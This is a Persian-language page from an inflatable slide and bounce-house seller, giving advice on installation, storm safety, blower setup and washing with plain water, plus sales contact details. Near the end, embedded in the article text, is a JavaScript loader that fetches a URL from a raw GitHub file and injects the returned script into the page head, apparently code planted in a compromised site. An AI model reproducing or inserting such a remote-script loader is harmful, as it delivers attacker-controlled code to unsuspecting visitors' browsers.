اشتباه رایج در استفاده سرسره بادی و نگهداری
اشتباه رایج در استفاده سرسره بادی و نگهداری

اشتباه رایج در استفاده سرسره بادی و نگهداری

  • اشتباه رایج در استفاده سرسره بادی های که اکثراً در نحوه نگهداری انجام می دهید و باعث پوسیدگی و پار شدن دستگاه میشود.

    نحوه نصب دستگاه

    اولین کاری که باید برای نصب دستگاه انجام دهید پهن کردن کاور زیر دستگاه است اگر این کاور را استفاده نکنید بر اثر سایدگی کف دستگاه پاره می شود. مرحله دوم زدن میخ های بزرگ بر روی زمین بعد بند های که روی خود دستگاه وجود داری به میخ ها متصل کنید. اشتباهی که اکثر افراد انجام می دهند کاوری که روی دستگاه باید بندازید نمی اندازند، وقتی کارتون با دستگاه تموم شد روی آن کاور بندازید چون بر اثر افتاب سوختی رنگ دستگاه از بین می رود، یکی دیگر از کار مانع نفوذ آب به دستگاه می شود.

    شرایت اضطراری

    به هیچ وجه هنگام باد طوفان سرسره رو باد نکید. اگر سرسره باد بود و باد طوفان یک دفعه شروع شد افراد را از روی دستگاه به پایین بیاورید دستگاه رو خاموش کنید و دریچه های تخلیه هوا را باز کنیید که هوای داخل دستگاه سریع تر تخلیه شود.

    اشتباه های رایج در نصب دمنده ها ( پمپ باد )

    یکی از رایج ترین اشتباه ها در نصب پمپ هوا، اکثر افراد به ما مراجعه میکنن که می گویند این دمنده ای که به ما داده اید برای این دستگاه مناسب نیست ولی شما باید بروید دریچه پمپ خود را چک کنید اگر دریچه ای که روی پمپ است بسته یا نیمه بسته است زور دمنده کم می شود. نکته خیلی مهم حتماٌ برای آن یک جعبه قفس مانند درست کنید و پمپ را داخل آن قرار دهید.

    نحوه شستشوی سرسره بادی

    برای شستشوی دستگاه فقط و فقط آب آن را بشوید اگر سرسره بادی را ریکا، وایتکس و … مواد شوینده دیگر بشویید دستگاه نخ و پارچه دستگاه پوسیده و از بین می رود.

    برای جلو گیری اشتباه رایج از استفاده سرسره بادی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید قصر بادی می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید